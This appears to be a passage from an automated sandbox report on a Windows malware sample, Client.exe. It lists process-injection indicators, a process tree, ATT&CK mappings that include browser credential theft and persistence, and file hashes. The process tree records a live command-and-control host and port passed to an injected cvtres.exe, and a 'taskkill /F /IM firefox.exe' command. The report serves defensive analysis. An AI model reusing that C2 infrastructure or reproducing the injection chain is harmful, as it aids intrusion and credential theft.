Token: SeShutdownPrivilege	4944	explorer.exe
Token: SeCreatePagefilePrivilege	4944	explorer.exe

Suspicious use of FindShellTrayWindow 37 IoCs

Processes:

explorer.exefirefox.exe

pid	Process
4944	explorer.exe
4944	explorer.exe
4944	explorer.exe
4944	explorer.exe
4944	explorer.exe
4944	explorer.exe
4944	explorer.exe
4944	explorer.exe
4944	explorer.exe
4944	explorer.exe
4944	explorer.exe
4944	explorer.exe
4944	explorer.exe
4944	explorer.exe
4944	explorer.exe
4944	explorer.exe
4944	explorer.exe
4944	explorer.exe
4944	explorer.exe
4944	explorer.exe
4944	explorer.exe
4944	explorer.exe
4944	explorer.exe
4944	explorer.exe
4944	explorer.exe
4944	explorer.exe
4944	explorer.exe
4944	explorer.exe
4944	explorer.exe
4944	explorer.exe
4944	explorer.exe
4944	explorer.exe
4944	explorer.exe
1640	firefox.exe
1640	firefox.exe
1640	firefox.exe
1640	firefox.exe

Suspicious use of SendNotifyMessage 23 IoCs

Processes:

explorer.exefirefox.exe

pid	Process
4944	explorer.exe
4944	explorer.exe
4944	explorer.exe
4944	explorer.exe
4944	explorer.exe
4944	explorer.exe
4944	explorer.exe
4944	explorer.exe
4944	explorer.exe
4944	explorer.exe
4944	explorer.exe
4944	explorer.exe
4944	explorer.exe
4944	explorer.exe
4944	explorer.exe
4944	explorer.exe
4944	explorer.exe
4944	explorer.exe
4944	explorer.exe
4944	explorer.exe
1640	firefox.exe
1640	firefox.exe
1640	firefox.exe

Suspicious use of SetWindowsHookEx 3 IoCs

Processes:

Client.exeSearchUI.exefirefox.exe

pid	Process
3080	Client.exe
1372	SearchUI.exe
1640	firefox.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

Client.exeexplorer.exefirefox.exefirefox.exe

description	pid	Process	procid_target
PID 3080 wrote to memory of 4944	3080	Client.exe	73
PID 3080 wrote to memory of 4944	3080	Client.exe	73
PID 3080 wrote to memory of 756	3080	Client.exe	74
PID 3080 wrote to memory of 756	3080	Client.exe	74
PID 3080 wrote to memory of 756	3080	Client.exe	74
PID 3080 wrote to memory of 756	3080	Client.exe	74
PID 3080 wrote to memory of 756	3080	Client.exe	74
PID 3080 wrote to memory of 756	3080	Client.exe	74
PID 3080 wrote to memory of 756	3080	Client.exe	74
PID 3080 wrote to memory of 756	3080	Client.exe	74
PID 4944 wrote to memory of 4912	4944	explorer.exe	76
PID 4944 wrote to memory of 4912	4944	explorer.exe	76
PID 4472 wrote to memory of 1640	4472	firefox.exe	85
PID 4472 wrote to memory of 1640	4472	firefox.exe	85
PID 4472 wrote to memory of 1640	4472	firefox.exe	85
PID 4472 wrote to memory of 1640	4472	firefox.exe	85
PID 4472 wrote to memory of 1640	4472	firefox.exe	85
PID 4472 wrote to memory of 1640	4472	firefox.exe	85
PID 4472 wrote to memory of 1640	4472	firefox.exe	85
PID 4472 wrote to memory of 1640	4472	firefox.exe	85
PID 4472 wrote to memory of 1640	4472	firefox.exe	85
PID 4472 wrote to memory of 1640	4472	firefox.exe	85
PID 4472 wrote to memory of 1640	4472	firefox.exe	85
PID 1640 wrote to memory of 5064	1640	firefox.exe	86
PID 1640 wrote to memory of 5064	1640	firefox.exe	86
PID 1640 wrote to memory of 3704	1640	firefox.exe	87
PID 1640 wrote to memory of 3704	1640	firefox.exe	87
PID 1640 wrote to memory of 3704	1640	firefox.exe	87
PID 1640 wrote to memory of 3704	1640	firefox.exe	87
PID 1640 wrote to memory of 3704	1640	firefox.exe	87
PID 1640 wrote to memory of 3704	1640	firefox.exe	87
PID 1640 wrote to memory of 3704	1640	firefox.exe	87
PID 1640 wrote to memory of 3704	1640	firefox.exe	87
PID 1640 wrote to memory of 3704	1640	firefox.exe	87
PID 1640 wrote to memory of 3704	1640	firefox.exe	87
PID 1640 wrote to memory of 3704	1640	firefox.exe	87
PID 1640 wrote to memory of 3704	1640	firefox.exe	87
PID 1640 wrote to memory of 3704	1640	firefox.exe	87
PID 1640 wrote to memory of 3704	1640	firefox.exe	87
PID 1640 wrote to memory of 3704	1640	firefox.exe	87
PID 1640 wrote to memory of 3704	1640	firefox.exe	87
PID 1640 wrote to memory of 3704	1640	firefox.exe	87
PID 1640 wrote to memory of 3704	1640	firefox.exe	87
PID 1640 wrote to memory of 3704	1640	firefox.exe	87
PID 1640 wrote to memory of 3704	1640	firefox.exe	87
PID 1640 wrote to memory of 3704	1640	firefox.exe	87
PID 1640 wrote to memory of 3704	1640	firefox.exe	87
PID 1640 wrote to memory of 3704	1640	firefox.exe	87
PID 1640 wrote to memory of 3704	1640	firefox.exe	87
PID 1640 wrote to memory of 3704	1640	firefox.exe	87
PID 1640 wrote to memory of 3704	1640	firefox.exe	87
PID 1640 wrote to memory of 3704	1640	firefox.exe	87
PID 1640 wrote to memory of 3704	1640	firefox.exe	87
PID 1640 wrote to memory of 3704	1640	firefox.exe	87
PID 1640 wrote to memory of 3704	1640	firefox.exe	87
PID 1640 wrote to memory of 3704	1640	firefox.exe	87
PID 1640 wrote to memory of 3704	1640	firefox.exe	87
PID 1640 wrote to memory of 3704	1640	firefox.exe	87
PID 1640 wrote to memory of 3704	1640	firefox.exe	87
PID 1640 wrote to memory of 3704	1640	firefox.exe	87
PID 1640 wrote to memory of 3704	1640	firefox.exe	87
PID 1640 wrote to memory of 3704	1640	firefox.exe	87
PID 1640 wrote to memory of 3704	1640	firefox.exe	87
PID 1640 wrote to memory of 3704	1640	firefox.exe	87

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Users\Admin\AppData\Local\Temp\Client.exe
"C:\Users\Admin\AppData\Local\Temp\Client.exe"
1⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:3080
- C:\Windows\explorer.exe
  "C:\Windows\explorer.exe"
  2⤵
  - Boot or Logon Autostart Execution: Active Setup
  - Enumerates connected drives
  - Drops file in Windows directory
  - Checks SCSI registry key(s)
  - Modifies registry class
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of SendNotifyMessage
  - Suspicious use of WriteProcessMemory
  PID:4944
- - C:\Windows\system32\ctfmon.exe
    ctfmon.exe
    3⤵
    PID:4912
- C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
  "C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" Client and-statements.gl.at.ply.gg 43442 gvwEQrvlK
  2⤵
  - System Location Discovery: System Language Discovery
  PID:756
- - C:\Windows\SysWOW64\cmd.exe
    "cmd.exe" /c taskkill /F /IM firefox.exe
    3⤵
    - System Location Discovery: System Language Discovery
    PID:4500
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /F /IM firefox.exe
      4⤵
      System Location Discovery: System Language Discovery
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:5140

C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
"C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe" -ServerName:CortanaUI.AppXa50dqqa5gqv4a428c9y1jjw7m3btvepj.mca
1⤵
- Drops file in Windows directory
- Enumerates system info in registry
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:1372

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:4472
- C:\Program Files\Mozilla Firefox\firefox.exe
  "C:\Program Files\Mozilla Firefox\firefox.exe"
  2⤵
  - Checks processor information in registry
  - Modifies registry class
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of SendNotifyMessage
  - Suspicious use of SetWindowsHookEx
  - Suspicious use of WriteProcessMemory
  PID:1640
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1640.0.237251287\1789786321" -parentBuildID 20221007134813 -prefsHandle 1708 -prefMapHandle 1472 -prefsLen 20747 -prefMapSize 233444 -appDir "C:\Program Files\Mozilla Firefox\browser" - {2cf870b3-4a8f-4a3d-9c00-6f6443be4c54} 1640 "\\.\pipe\gecko-crash-server-pipe.1640" 1796 2f433d08158 gpu
    3⤵
    PID:5064
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1640.1.881580077\678147140" -parentBuildID 20221007134813 -prefsHandle 2124 -prefMapHandle 2120 -prefsLen 20828 -prefMapSize 233444 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {6492cd41-ea57-4a25-aa3b-a1e85e39fafb} 1640 "\\.\pipe\gecko-crash-server-pipe.1640" 2152 2f43263a458 socket
    3⤵
    PID:3704
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1640.2.1144440426\1893511090" -childID 1 -isForBrowser -prefsHandle 2868 -prefMapHandle 2864 -prefsLen 20931 -prefMapSize 233444 -jsInitHandle 1288 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {7f8b4091-e0c3-4f19-9e7f-16d1bd281747} 1640 "\\.\pipe\gecko-crash-server-pipe.1640" 2880 2f436af8858 tab
    3⤵
    PID:4516
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1640.3.470624211\1708762684" -childID 2 -isForBrowser -prefsHandle 3472 -prefMapHandle 3468 -prefsLen 26109 -prefMapSize 233444 -jsInitHandle 1288 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {2f19151d-ebf8-4b76-adf2-8df27ba20484} 1640 "\\.\pipe\gecko-crash-server-pipe.1640" 3484 2f427b5be58 tab
    3⤵
    PID:4680
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1640.4.1955847655\1081968276" -childID 3 -isForBrowser -prefsHandle 3948 -prefMapHandle 3256 -prefsLen 26168 -prefMapSize 233444 -jsInitHandle 1288 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {c882fd7f-db72-49eb-86b3-1bc69d14e401} 1640 "\\.\pipe\gecko-crash-server-pipe.1640" 4068 2f437a20258 tab
    3⤵
    PID:1612
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1640.5.947867670\1145247944" -childID 4 -isForBrowser -prefsHandle 4872 -prefMapHandle 4868 -prefsLen 26249 -prefMapSize 233444 -jsInitHandle 1288 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {06b23609-a926-4404-9be1-1c31cca93979} 1640 "\\.\pipe\gecko-crash-server-pipe.1640" 4884 2f427b6d058 tab
    3⤵
    PID:948
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1640.6.2058976277\669069506" -childID 5 -isForBrowser -prefsHandle 5024 -prefMapHandle 5028 -prefsLen 26249 -prefMapSize 233444 -jsInitHandle 1288 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {302b71da-4c13-49f0-990e-ed91af0e99c3} 1640 "\\.\pipe\gecko-crash-server-pipe.1640" 5016 2f439322258 tab
    3⤵
    PID:1660
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1640.7.316921849\1348054303" -childID 6 -isForBrowser -prefsHandle 5220 -prefMapHandle 5224 -prefsLen 26249 -prefMapSize 233444 -jsInitHandle 1288 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {af411499-e100-46e4-a301-1f10fe00de62} 1640 "\\.\pipe\gecko-crash-server-pipe.1640" 5212 2f4393a9658 tab
    3⤵
    PID:200

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Boot or Logon Autostart Execution

T1547

Active Setup

T1547.014

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Active Setup

T1547.014

Defense Evasion

Modify Registry

T1112

Credential Access

Credentials from Password Stores

T1555

Credentials from Web Browsers

T1555.003

Discovery

Peripheral Device Discovery

T1120

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\wjyk7j4u.default-release\datareporting\glean\db\data.safe.bin

Filesize
2KB

MD5
ad2f37d84f043077d207db8a01c162dd

SHA1
826dc3557199e3e593cb25fb91698c298eecbf3a

SHA256
cdb993bf69609390930bdcdbfb3bf6522d45aa65fc82f3b8b257970ecbcff3ab

SHA512
8addf8333ef33e8de9971dcc6093325b76cbd25f05880c688db4a25d6f7b1d21da85c114ab16ed98ec057fd393aeb8ef494224cca027b17bceac472b951fc6d1

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\wjyk7j4u.default-release\datareporting\glean\pending_pings\c9c9ed9f-eec1-4c49-b083-ea0760820065

Filesize
9KB

MD5
bcf530e5eb125bfd643c0f736bb9b642

SHA1
29cb0d06d9bac4f924e662230850ec610def7cfe

SHA256
9219e78204cb55cf91871f64905815be6d6725568a87dc245719b05b3257c7c3

SHA512
2aaa673830762b95a67be54a3abf5312d18a1705847b302309eb1205747fb588cd0d15752ec52e2362a96ef155c3595248492f1b23a03f20a6c59c4be1d45cff

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\wjyk7j4u.default-release\datareporting\glean\pending_pings\e7d16f5b-444d-40f4-8182-efb1151a1d0d

Filesize
746B

MD5
935f8e7d6f24787e097cd38b5b99fcc0

SHA1
3bd24d06fc8301252273416e69b2b8279e1ead10

SHA256
445ff5c4746788d874a722f9193996246a50a902bb3ea4bcb19283f44b4ea136

SHA512
c2c06c610331b20305882fb045a141071c7b3fce24c0ba6015ddb10dfcba450889c9851cb5a72e2d5a2114ff1cc85652fe2b868e5aa508289fc5d4f04ed067b1

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\wjyk7j4u.default-release\prefs.js

Filesize
6KB

MD5
97f54db01153d253f5291ecdc56f2d70

SHA1
c1a696309a118de9c83856730e6c7a95f3d27246

SHA256
98d289ca6771ec98aee9f44785616537e4b7cb10e37ae92ab463c60d50b57e26

SHA512
8262ef2e0d4d50f12609e793a24be6576c430787f4f7ed722496e94e7e55f1fd95cdf9aaccc0392bee11758fa39f421813b1262bceb46dedca1dfaf7240638f6

Download Submit
memory/756-12-0x000000000A2F0000-0x000000000A340000-memory.dmp

Filesize
320KB

Download
memory/756-6-0x0000000009120000-0x00000000091B2000-memory.dmp

Filesize
584KB

Download
memory/756-8-0x0000000009AC0000-0x0000000009FBE000-memory.dmp

Filesize
5.0MB

Download
memory/756-9-0x000000000A030000-0x000000000A096000-memory.dmp

Filesize
408KB

Download
memory/756-7-0x0000000009220000-0x00000000092BC000-memory.dmp

Filesize
624KB

Download
memory/756-2-0x0000000000400000-0x0000000000418000-memory.dmp

Filesize
96KB

Download
memory/1372-19-0x0000014B66900000-0x0000014B66A00000-memory.dmp

Filesize
1024KB

Download
memory/1372-20-0x0000014B66900000-0x0000014B66A00000-memory.dmp

Filesize
1024KB

Download
memory/1372-26-0x0000014B670C0000-0x0000014B670E0000-memory.dmp

Filesize
128KB

Download
memory/1372-48-0x0000014B672C0000-0x0000014B672E0000-memory.dmp

Filesize
128KB

Download
memory/3080-0-0x000002C24A380000-0x000002C24A3AE000-memory.dmp

Filesize
184KB

Download
memory/3080-82-0x00007FFCF86F0000-0x00007FFCF90DC000-memory.dmp

Filesize
9.9MB

Download
memory/3080-5-0x00007FFCF86F0000-0x00007FFCF90DC000-memory.dmp

Filesize
9.9MB

Download
memory/3080-1-0x00007FFCF86F3000-0x00007FFCF86F4000-memory.dmp

Filesize
4KB

Download
memory/4944-17-0x0000000002C70000-0x0000000002C71000-memory.dmp

Filesize
4KB

Download